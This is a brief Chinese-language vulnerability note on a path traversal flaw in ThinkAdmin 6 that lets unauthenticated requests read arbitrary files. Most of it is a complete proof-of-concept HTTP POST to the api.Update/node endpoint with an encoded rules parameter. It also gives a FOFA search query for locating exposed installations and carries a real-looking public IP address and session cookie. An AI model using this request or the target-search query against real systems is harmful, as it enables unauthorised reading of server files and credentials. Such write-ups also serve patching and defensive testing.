简述
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统
漏洞描述
ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。
漏洞复现
fofa搜索语句 app="ThinkAdmin"
POC
POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://139.159.192.181
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://139.159.192.181/admin/login.html/?s=admin/api.Update/node
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=f54b3a7d1d63edc5a264133ef6865e95
Connection: close
rules=%5B%22%2F%22%5D